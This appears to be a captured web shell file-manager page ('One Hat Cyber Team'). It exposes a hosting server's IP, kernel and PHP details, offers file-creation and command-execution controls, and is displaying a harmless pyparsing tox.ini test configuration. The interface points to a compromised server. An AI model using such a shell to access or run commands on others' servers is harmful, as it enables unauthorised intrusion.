⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.118
Server IP:
93.127.201.55
Server:
Linux sg-nme-web1518.main-hosting.eu 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
gsutil
/
third_party
/
pyparsing
/
View File Name :
tox.ini
[tox] skip_missing_interpreters=true envlist = py{39,310,311,312,313,314,py3},mypy-check isolated_build = True [testenv] deps= pytest matplotlib; implementation_name != 'pypy' and python_version <'3.14' extras=diagrams commands= pytest tests {posargs} allowlist_externals = pytest python [testenv:mypy-check] deps = mypy commands = mypy --show-error-codes --warn-unused-ignores pyparsing